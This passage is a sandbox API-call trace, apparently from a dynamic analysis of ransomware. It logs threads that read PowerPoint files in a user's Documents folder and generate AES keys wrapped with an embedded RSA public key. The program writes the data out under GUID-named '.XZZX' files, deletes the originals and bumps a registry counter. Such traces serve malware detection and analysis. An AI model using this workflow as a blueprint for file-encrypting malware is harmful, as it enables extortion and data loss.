lpData=0x42cdfec*=0x29, lpcbData=0x42cdfdc*=0x4) returned 0x0 [0041.369] RegCloseKey (hKey=0x4a4) returned 0x0 [0041.369] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x42cdfe8 | out: phkResult=0x42cdfe8*=0x4a4) returned 0x0 [0041.369] RegSetValueExW (in: hKey=0x4a4, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x42cdfec*=0x2a, cbData=0x4 | out: lpData=0x42cdfec*=0x2a) returned 0x0 [0041.369] RegCloseKey (hKey=0x4a4) returned 0x0 [0041.369] VirtualFree (lpAddress=0x3e50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.369] VirtualFree (lpAddress=0x3e60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.370] CloseHandle (hObject=0x4c4) returned 1 [0041.371] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0041.372] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0041.372] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\dUnN.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ikpxup8ushighl1\\dunn.ppt")) returned 1 [0041.374] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\dUnN.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ikpxup8ushighl1\\dunn.ppt")) returned 0 Thread: id = 136 os_tid = 0x8e4 [0041.372] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0041.372] lstrcpyW (in: lpString1=0x417f460, lpString2="DyX3zmFDQ.pps" | out: lpString1="DyX3zmFDQ.pps") returned="DyX3zmFDQ.pps" [0041.372] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0041.372] SetErrorMode (uMode=0x1) returned 0x1 [0041.372] lstrcpyW (in: lpString1=0x417f860, lpString2="DyX3zmFDQ.pps" | out: lpString1="DyX3zmFDQ.pps") returned="DyX3zmFDQ.pps" [0041.372] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0x1e92e35, Data2=0xc677, Data3=0x41b1, Data4=([0]=0x87, [1]=0x53, [2]=0x73, [3]=0x59, [4]=0x56, [5]=0xbf, [6]=0x9b, [7]=0x3e))) returned 0x0 [0041.373] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\DyX3zmFDQ.pps") returned 94 [0041.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0041.373] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\3D2178A332ED6F4701E92E353705538F.XZZX") returned 118 [0041.373] StrStrW (lpFirst="DyX3zmFDQ.pps", lpSrch="XZZX") returned 0x0 [0041.373] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\DyX3zmFDQ.pps", dwFileAttributes=0x20) returned 1 [0041.374] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\DyX3zmFDQ.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ikpxup8ushighl1\\dyx3zmfdq.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c4 [0041.375] ReadFile (in: hFile=0x4c4, lpBuffer=0x42e5eb8, nNumberOfBytesToRead=0x1806b, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x42e5eb8*, lpNumberOfBytesRead=0x417e418*=0x1806b, lpOverlapped=0x0) returned 1 [0041.375] CloseHandle (hObject=0x4c4) returned 1 [0041.375] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e50000 [0041.376] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3e60000 [0041.376] SetErrorMode (uMode=0x1) returned 0x1 [0041.376] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0041.376] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e2e968) returned 1 [0041.378] CryptGenKey (in: hProv=0x3e2e968, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e5550) returned 1 [0041.629] CryptExportKey (in: hKey=0x42e5550, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0041.629] CryptExportKey (in: hKey=0x42e5550, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3e60000, pdwDataLen=0x417e41c | out: pbData=0x3e60000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0041.629] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0041.630] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0041.630] CryptDestroyKey (hKey=0x42e5550) returned 1 [0041.630] CryptReleaseContext (hProv=0x3e2e9f0, dwFlags=0x0) returned 0 [0041.630] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\3D2178A332ED6F4701E92E353705538F.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ikpxup8ushighl1\\3d2178a332ed6f4701e92e353705538f.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a4 [0041.631] WriteFile (in: hFile=0x4a4, lpBuffer=0x42e5eb8*, nNumberOfBytesToWrite=0x1806b, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x42e5eb8*, lpNumberOfBytesWritten=0x417e438*=0x1806b, lpOverlapped=0x0) returned 1 [0041.632] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1806b [0041.633] WriteFile (in: hFile=0x4a4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0041.633] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x18070 [0041.633] WriteFile (in: hFile=0x4a4, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x1a, lpOverlapped=0x0) returned 1 [0041.633] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1808a [0041.633] WriteFile (in: hFile=0x4a4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0041.633] SetFilePointer (in: hFile=0x4a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1808f [0041.633] SetErrorMode (uMode=0x1) returned 0x1 [0041.633] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0041.633] OutputDebugStringW (lpOutputString="end") [0041.633] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wp\x91â\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0041.634] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0041.634] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x3e2ea78) returned 1 [0041.635] CryptImportPublicKeyInfo (in: hCryptProv=0x3e2ea78, dwCertEncodingType=0x1, pInfo=0x3e3f150*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e3f180*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e3f188*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x42e5550) returned 1 [0041.635] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0041.635] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0041.636] CryptEncrypt (in: hKey=0x42e5550, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0041.636] CryptEncrypt (in: hKey=0x42e5550, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e2eb00*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e2eb00*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0041.636] WriteFile (in: hFile=0x4a4, lpBuffer=0x3e2eb00*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x3e2eb00*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0041.636] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0041.636] WriteFile (in: hFile=0x4a4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0041.636] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0041.679] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0041.679] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x4c8) returned 0x0 [0041.679] RegQueryValueExW (in: hKey=0x4c8, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x2a, lpcbData=0x417dfdc*=0x4) returned 0x0 [0041.679] RegCloseKey (hKey=0x4c8) returned 0x0 [0041.679] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x4c8) returned 0x0 [0041.680] RegSetValueExW (in: hKey=0x4c8, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x2b, cbData=0x4 | out: lpData=0x417dfec*=0x2b) returned 0x0 [0041.680] RegCloseKey (hKey=0x4c8) returned 0x0 [0041.680] VirtualFree (lpAddress=0x3e50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.680] VirtualFree (lpAddress=0x3e60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0041.680] CloseHandle (hObject=0x4a4) returned 1 [0041.682] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0041.683] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0041.683] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\DyX3zmFDQ.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ikpxup8ushighl1\\dyx3zmfdq.pps")) returned 1 [0041.684] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\DyX3zmFDQ.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ikpxup8ushighl1\\dyx3zmfdq.pps")) returned 0 Thread: id = 137 os_tid = 0x950 [0041.555] lstrcpyA (in: lpString1=0x42cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0041.555] lstrcpyW (in: lpString1=0x42cf460, lpString2="Kv3rt4CpuhTFQ.pptx" | out: lpString1="Kv3rt4CpuhTFQ.pptx") returned="Kv3rt4CpuhTFQ.pptx" [0041.555] lstrcpyW (in: lpString1=0x42ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0041.555] SetErrorMode (uMode=0x1) returned 0x1 [0041.555] lstrcpyW (in: lpString1=0x42cf860, lpString2="Kv3rt4CpuhTFQ.pptx" | out: lpString1="Kv3rt4CpuhTFQ.pptx") returned="Kv3rt4CpuhTFQ.pptx" [0041.555] CoCreateGuid (in: pguid=0x42ce440 | out: pguid=0x42ce440*(Data1=0xada8003e, Data2=0x392b, Data3=0x458c, Data4=([0]=0x88, [1]=0x69, [2]=0xa8, [3]=0xfd, [4]=0x0, [5]=0x39, [6]=0x16, [7]=0x4b))) returned 0x0 [0041.555] wsprintfW (in: param_1=0x42cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\Kv3rt4CpuhTFQ.pptx") returned 99 [0041.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x42cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0041.555] wsprintfW (in: param_1=0x42ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\9345D86A0F87DA84ADA8003E13B4BECC.XZZX") returned 118 [0041.555] StrStrW (lpFirst="Kv3rt4CpuhTFQ.pptx", lpSrch="XZZX") returned 0x0 [0041.556] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\Kv3rt4CpuhTFQ.pptx", dwFileAttributes=0x20) returned 1 [0041.556] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\Kv3rt4CpuhTFQ.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ikpxup8ushighl1\\kv3rt4cpuhtfq.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a4 [0041.556] ReadFile (in: hFile=0x4a4, lpBuffer=0x42fdf30, nNumberOfBytesToRead=0x15a8c, lpNumberOfBytesRead=0x42ce418, lpOverlapped=0x0 | out: lpBuffer=0x42fdf30*, lpNumberOfBytesRead=0x42ce418*=0x15a8c, lpOverlapped=0x0) returned 1 [0041.557] CloseHandle (hObject=0x4a4) returned 1 [0041.557] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3ef0000 [0041.557] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3f00000 [0041.558] SetErrorMode (uMode=0x1) returned 0x1 [0041.558] lstrcpyW (in: lpString1=0x42ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0041.558] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e2e9f0) returned 1 [0041.561] CryptGenKey (in: hProv=0x3e2e9f0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x42e55d0) returned 1 [0041.800] CryptExportKey (in: hKey=0x42e55d0, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x42ce41c | out: pbData=0x0*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0041.800] CryptExportKey (in: hKey=0x42e55d0, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3f00000, pdwDataLen=0x42ce41c | out: pbData=0x3f00000*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0041.800] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0041.800] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0041.800] CryptDestroyKey (hKey=0x42e55d0) returned 1 [0041.801] CryptReleaseContext (hProv=0x3e2eb88, dwFlags=0x0) returned 0 [0041.801] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\9345D86A0F87DA84ADA8003E13B4BECC.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lhhnd9lew5xmlxw00jfa\\ikpxup8ushighl1\\9345d86a0f87da84ada8003e13b4becc.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b0 [0041.801] WriteFile (in: hFile=0x4b0, lpBuffer=0x42fdf30*, nNumberOfBytesToWrite=0x15a8c, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42fdf30*, lpNumberOfBytesWritten=0x42ce438*=0x15a8c, lpOverlapped=0x0) returned 1 [0041.804] SetFilePointer (in: hFile=0x4b0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x15a8c [0041.804] WriteFile (in: hFile=0x4b0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0041.804] SetFilePointer (in: hFile=0x4b0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x15a91 [0041.804] WriteFile (in: hFile=0x4b0, lpBuffer=0x42cf860*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x42cf860*, lpNumberOfBytesWritten=0x42ce438*=0x24, lpOverlapped=0x0) returned 1 [0041.804] SetFilePointer (in: hFile=0x4b0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x15ab5 [0041.804] WriteFile (in: hFile=0x4b0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ce438*=0x5, lpOverlapped=0x0) returned 1 [0041.804] SetFilePointer (in: hFile=0x4b0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x15aba [0041.804] SetErrorMode (uMode=0x1) returned 0x1 [0041.804] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0041.804] OutputDebugStringW (lpOutputString="end") [0041.805] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wX\x934", cchString=0x0, dwFlags=0x0, pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x42cdbf4, pcbBinary=0x42cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0041.805] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x42cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8 | out: pvStructInfo=0x42cd3dc, pcbStructInfo=0x42cd3d8) returned 1 [0041.805] CryptAcquireContextW (in: phProv=0x42cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x42cd3e4*=0x3e2ec10) returned 1 [0041.805] CryptImportPublicKeyInfo (in: hCryptProv=0x3e2ec10, dwCertEncodingType=0x1, pInfo=0x3e3f220*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3e3f250*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3e3f258*, PublicKey.cUnusedBits=0x0), phKey=0x42cd3ec | out: phKey=0x42cd3ec*=0x42e55d0) returned 1 [0041.805] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0041.806] 